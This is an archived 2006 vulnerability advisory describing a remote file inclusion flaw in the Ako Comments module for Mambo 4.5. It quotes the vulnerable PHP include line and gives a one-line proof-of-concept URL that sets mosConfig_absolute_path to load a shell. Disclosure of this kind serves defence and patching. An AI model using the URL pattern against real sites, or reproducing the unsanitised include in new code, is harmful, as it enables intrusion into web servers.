OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Ako Comments (mod) Remote File Inclusion

Outlawaria-security.net
Date: Sat Aug 19 2006 - 03:16:57 CDT


                ###########################################################################################
                # Aria-Security.net Advisory #
                # Discovered by: O.U.T.L.A.W #

                # < www.Aria-security.net > #
                # Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #
                # #
                ###########################################################################################

#Software: Ako Comments (mod)
#Attack method: Remote File Inclusion
#Source:
   
#Description: This module shows users' comments from component AkoComments.
#File Version: 1.1 for Mambo 4.5

include_once($mosConfig_absolute_path.'/components/com_akocomment/languages/'.$mosConfig_lang.'.php');

************************************************************************************

                                                                                           
#Proof of Concept:
#http://www.site.com/akocomments.php?mosConfig_absolute_path=shell
#
#----------------------------------------------------------
#

                                                          
#
#Contact : Outlawaria-security.net